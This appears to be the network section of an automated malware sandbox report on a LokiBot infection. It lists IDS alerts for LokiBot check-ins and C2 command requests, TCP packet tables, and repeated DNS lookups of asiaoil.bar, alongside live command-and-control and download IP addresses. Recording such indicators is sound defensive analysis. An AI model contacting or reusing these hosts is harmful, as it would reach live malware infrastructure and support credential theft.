                    02/10/22-10:23:30.804451TCP2025381ET TROJAN LokiBot Checkin4924580192.168.2.22172.67.197.66
                    02/10/22-10:23:30.804451TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924580192.168.2.22172.67.197.66
                    02/10/22-10:23:31.841168TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924680192.168.2.22172.67.197.66
                    02/10/22-10:23:31.841168TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924680192.168.2.22172.67.197.66
                    02/10/22-10:23:31.841168TCP2025381ET TROJAN LokiBot Checkin4924680192.168.2.22172.67.197.66
                    02/10/22-10:23:31.841168TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924680192.168.2.22172.67.197.66
                    02/10/22-10:23:32.863722TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14924780192.168.2.22172.67.197.66
                    02/10/22-10:23:32.863722TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4924780192.168.2.22172.67.197.66
                    02/10/22-10:23:32.863722TCP2025381ET TROJAN LokiBot Checkin4924780192.168.2.22172.67.197.66
                    02/10/22-10:23:32.863722TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24924780192.168.2.22172.67.197.66

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Feb 10, 2022 10:21:50.148709059 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.261291027 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.261378050 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.261872053 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.385209084 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.385242939 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.385256052 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.385267019 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.385279894 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.385297060 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.385313034 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.385329962 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.385346889 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.385364056 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.385413885 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.386713982 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.398227930 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.497762918 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.497796059 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.497813940 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.497829914 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.497843027 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.497869015 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.497876883 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.497900009 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.497900963 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.497920990 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.497925043 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.497939110 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.497953892 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.502103090 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.502135992 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.502152920 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.502172947 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.502180099 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.502196074 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.502212048 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.502214909 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.502219915 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.502230883 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.502244949 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.502262115 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.502269030 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.502276897 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.502290964 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.502310991 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.502311945 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.502329111 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.502335072 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.502346039 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.502358913 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.502370119 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.502393961 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.502480030 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610299110 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610330105 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610347033 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610369921 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610374928 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610393047 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610408068 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610410929 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610425949 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610477924 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610522985 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610563040 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610606909 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610723972 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610761881 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610779047 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610796928 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610820055 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610820055 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610835075 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610847950 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610851049 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610867977 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610887051 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610889912 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610899925 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610913038 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610928059 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610934973 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.610943079 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.610970020 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.611434937 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.614706993 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.614736080 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.614754915 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.614767075 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.614779949 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.614790916 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.614793062 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.614804983 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.614820957 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.614828110 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.614845991 CET8049165198.46.132.195192.168.2.22
                    Feb 10, 2022 10:21:50.614851952 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.614866018 CET4916580192.168.2.22198.46.132.195
                    Feb 10, 2022 10:21:50.614871979 CET8049165198.46.132.195192.168.2.22

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Feb 10, 2022 10:21:59.657758951 CET5216753192.168.2.228.8.8.8
                    Feb 10, 2022 10:21:59.679673910 CET53521678.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:02.798513889 CET5059153192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:02.820064068 CET53505918.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:03.787553072 CET5780553192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:03.806817055 CET53578058.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:04.872561932 CET5903053192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:04.893670082 CET53590308.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:05.912199020 CET5918553192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:05.933922052 CET53591858.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:06.966857910 CET5561653192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:06.985570908 CET53556168.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:08.076816082 CET4997253192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:08.106977940 CET53499728.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:09.230184078 CET5177153192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:09.252610922 CET53517718.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:10.377916098 CET5986753192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:10.394609928 CET53598678.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:11.444910049 CET5031553192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:11.461467028 CET53503158.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:12.512779951 CET5007253192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:12.531579971 CET53500728.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:13.589272022 CET5430453192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:13.606112957 CET53543048.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:14.746339083 CET4989453192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:14.763432026 CET53498948.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:15.840691090 CET6464553192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:15.859421015 CET53646458.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:17.182943106 CET5374553192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:17.201698065 CET53537458.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:18.547647953 CET5435853192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:18.564426899 CET53543588.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:20.264818907 CET6501753192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:20.282020092 CET53650178.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:21.332977057 CET5834153192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:21.349742889 CET53583418.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:22.452615976 CET5638353192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:22.469295979 CET53563838.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:23.465867043 CET6217253192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:23.484388113 CET53621728.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:24.550992012 CET6085953192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:24.567791939 CET53608598.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:25.553512096 CET5905553192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:25.572346926 CET53590558.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:26.633922100 CET6006453192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:26.651072025 CET53600648.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:27.648459911 CET5168953192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:27.667135954 CET53516898.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:29.048799038 CET5500053192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:29.064960003 CET53550008.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:30.756577969 CET6418753192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:30.776675940 CET53641878.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:31.841069937 CET5944953192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:31.858690977 CET53594498.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:32.912058115 CET5842453192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:32.930648088 CET53584248.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:33.968051910 CET6243153192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:33.985292912 CET53624318.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:35.016231060 CET5287953192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:35.035057068 CET53528798.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:36.033919096 CET6007453192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:36.052189112 CET53600748.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:37.078222036 CET5150653192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:37.097563982 CET53515068.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:38.129494905 CET5061553192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:38.148770094 CET53506158.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:39.180749893 CET5901253192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:39.203105927 CET53590128.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:40.243946075 CET6273853192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:40.399499893 CET53627388.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:41.397644043 CET5999253192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:41.416198015 CET53599928.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:42.486350060 CET5412853192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:42.509901047 CET53541288.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:43.505530119 CET5286053192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:43.524178982 CET53528608.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:44.545278072 CET6174253192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:44.563961983 CET53617428.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:45.600828886 CET5310653192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:45.620157957 CET53531068.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:46.679800987 CET5107153192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:46.698565960 CET53510718.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:47.694005966 CET5522553192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:47.712665081 CET53552258.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:48.794428110 CET5182253192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:48.813474894 CET53518228.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:49.859730005 CET5720653192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:49.878983974 CET53572068.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:51.002474070 CET6147153192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:51.019309044 CET53614718.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:52.024955988 CET6258453192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:52.041841030 CET53625848.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:53.105232000 CET5415153192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:53.123905897 CET53541518.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:54.168021917 CET6531753192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:54.186261892 CET53653178.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:55.185018063 CET5772253192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:55.202280998 CET53577228.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:56.195903063 CET6471553192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:56.214804888 CET53647158.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:57.314579964 CET5620753192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:57.333787918 CET53562078.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:58.398493052 CET6496353192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:58.417352915 CET53649638.8.8.8192.168.2.22
                    Feb 10, 2022 10:22:59.502744913 CET6537953192.168.2.228.8.8.8
                    Feb 10, 2022 10:22:59.519994974 CET53653798.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:00.513632059 CET5623353192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:00.533606052 CET53562338.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:01.576647043 CET6070653192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:01.595443010 CET53607068.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:02.585699081 CET4936653192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:02.604903936 CET53493668.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:03.632282972 CET5014153192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:03.649529934 CET53501418.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:04.624403954 CET5206953192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:04.640897036 CET53520698.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:05.917184114 CET6378853192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:05.934077978 CET53637888.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:08.555697918 CET5319053192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:08.573890924 CET53531908.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:09.629110098 CET5671953192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:09.647778988 CET53567198.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:10.670913935 CET5758453192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:10.689938068 CET53575848.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:11.707644939 CET5081553192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:11.726572037 CET53508158.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:12.786386967 CET5809353192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:12.805661917 CET53580938.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:13.874433041 CET6090253192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:13.894022942 CET53609028.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:14.890866041 CET5371053192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:14.907351017 CET53537108.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:16.130302906 CET5890853192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:16.148524046 CET53589088.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:17.382666111 CET5034653192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:17.401235104 CET53503468.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:18.736026049 CET6022153192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:18.763688087 CET53602218.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:19.799702883 CET5571353192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:19.818831921 CET53557138.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:20.931313992 CET6339853192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:20.950112104 CET53633988.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:22.033031940 CET5569353192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:22.051954985 CET53556938.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:23.098339081 CET5997953192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:23.115072966 CET53599798.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:25.154160023 CET6499553192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:25.172872066 CET53649958.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:26.716438055 CET5328953192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:26.735743999 CET53532898.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:27.763015032 CET6257853192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:27.781708956 CET53625788.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:28.759797096 CET5010853192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:28.778294086 CET53501088.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:29.753248930 CET5360553192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:29.769979954 CET53536058.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:30.760308981 CET5159353192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:30.778796911 CET53515938.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:31.802032948 CET5015753192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:31.820941925 CET53501578.8.8.8192.168.2.22
                    Feb 10, 2022 10:23:32.823729992 CET5395253192.168.2.228.8.8.8
                    Feb 10, 2022 10:23:32.840801001 CET53539528.8.8.8192.168.2.22

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Feb 10, 2022 10:21:59.657758951 CET192.168.2.228.8.8.80x9747Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:02.798513889 CET192.168.2.228.8.8.80x71fStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:03.787553072 CET192.168.2.228.8.8.80xa539Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:04.872561932 CET192.168.2.228.8.8.80xa7ceStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:05.912199020 CET192.168.2.228.8.8.80xe425Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:06.966857910 CET192.168.2.228.8.8.80x51a3Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:08.076816082 CET192.168.2.228.8.8.80x49f3Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:09.230184078 CET192.168.2.228.8.8.80x2021Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:10.377916098 CET192.168.2.228.8.8.80xe478Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:11.444910049 CET192.168.2.228.8.8.80xd27fStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:12.512779951 CET192.168.2.228.8.8.80xa6adStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:13.589272022 CET192.168.2.228.8.8.80x1d7bStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:14.746339083 CET192.168.2.228.8.8.80xc406Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:15.840691090 CET192.168.2.228.8.8.80x45dcStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:17.182943106 CET192.168.2.228.8.8.80xb6dcStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:18.547647953 CET192.168.2.228.8.8.80xbbf0Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:20.264818907 CET192.168.2.228.8.8.80x795eStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:21.332977057 CET192.168.2.228.8.8.80xeeebStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:22.452615976 CET192.168.2.228.8.8.80xe527Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:23.465867043 CET192.168.2.228.8.8.80xfad8Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:24.550992012 CET192.168.2.228.8.8.80xc89cStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:25.553512096 CET192.168.2.228.8.8.80xe031Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:26.633922100 CET192.168.2.228.8.8.80x61b1Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:27.648459911 CET192.168.2.228.8.8.80xe5e0Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:29.048799038 CET192.168.2.228.8.8.80x1048Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:30.756577969 CET192.168.2.228.8.8.80x5557Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:31.841069937 CET192.168.2.228.8.8.80x74efStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:32.912058115 CET192.168.2.228.8.8.80x14c8Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:33.968051910 CET192.168.2.228.8.8.80x860fStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:35.016231060 CET192.168.2.228.8.8.80xfea3Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:36.033919096 CET192.168.2.228.8.8.80x2516Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:37.078222036 CET192.168.2.228.8.8.80xff8aStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:38.129494905 CET192.168.2.228.8.8.80x7ac5Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:39.180749893 CET192.168.2.228.8.8.80xb649Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:40.243946075 CET192.168.2.228.8.8.80x55b7Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:41.397644043 CET192.168.2.228.8.8.80x9913Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:42.486350060 CET192.168.2.228.8.8.80xd5cfStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:43.505530119 CET192.168.2.228.8.8.80xe474Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:44.545278072 CET192.168.2.228.8.8.80xd627Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:45.600828886 CET192.168.2.228.8.8.80xffb2Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:46.679800987 CET192.168.2.228.8.8.80x24d3Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:47.694005966 CET192.168.2.228.8.8.80x664bStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:48.794428110 CET192.168.2.228.8.8.80xc7a4Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:49.859730005 CET192.168.2.228.8.8.80x3468Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:51.002474070 CET192.168.2.228.8.8.80xfa95Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:52.024955988 CET192.168.2.228.8.8.80xd853Standard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:53.105232000 CET192.168.2.228.8.8.80xc5beStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:54.168021917 CET192.168.2.228.8.8.80x412aStandard query (0)asiaoil.barA (IP address)IN (0x0001)
                    Feb 10, 2022 10:22:55.185018063 CET192.168.2.228.8.8.80x6266Standard query (0)asiaoil.barA (IP address)IN (0x0001)
